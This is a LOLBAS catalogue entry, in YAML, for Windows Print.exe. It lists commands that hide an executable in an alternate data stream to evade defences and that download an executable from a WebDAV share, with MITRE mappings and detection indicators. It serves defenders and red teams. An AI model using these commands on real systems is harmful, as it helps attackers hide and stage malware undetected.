LOLBAS/yml/OSBinaries/Print.yml

45 lines
1.8 KiB
YAML
Raw Normal View History

2018-06-09 00:15:06 +02:00
---
Name: Print.exe
Description: Used by Windows to send files to the printer
Author: 'Oddvar Moe'
2018-06-09 00:15:06 +02:00
Created: '2018-05-25'
Commands:
- Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
Usecase: Hide binary file in alternate data stream to potentially bypass defensive counter measures
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
2018-06-09 00:15:06 +02:00
- Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe
Description: Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe
Usecase: Copy files
Category: Copy
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
2018-06-09 00:15:06 +02:00
- Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe
Description: Copy File.exe from a network share to the target c:\OutFolder\outfile.exe.
Usecase: Copy/Download file from remote server
Category: Copy
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
2018-06-09 00:15:06 +02:00
Full Path:
- Path: C:\Windows\System32\print.exe
- Path: C:\Windows\SysWOW64\print.exe
Code Sample:
- Code:
Detection:
- IOC: Print.exe getting files from internet
- IOC: Print.exe creating executable files on disk
2018-06-09 00:15:06 +02:00
Resources:
- Link: https://twitter.com/Oddvarmoe/status/985518877076541440
- Link: https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---